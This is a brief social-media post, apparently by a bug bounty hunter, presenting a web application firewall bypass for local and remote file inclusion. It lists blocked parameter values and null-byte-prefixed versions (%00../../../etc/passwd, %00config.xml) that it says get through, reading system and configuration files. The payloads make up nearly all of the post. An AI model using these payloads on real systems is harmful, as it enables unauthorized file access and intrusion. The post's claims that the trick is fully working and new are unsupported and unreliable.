Just discovered a weird but 100% working #WAF #Bypass – When RFI/LFI are blocked

Don’t works.
path=../../../etc/passwd
file=config.xml

Works.
path=%00../../../etc/passwd
file=%00config.xml

This works successfully. Quite a new direction for WAF bypassing. #bugbounty #Infosec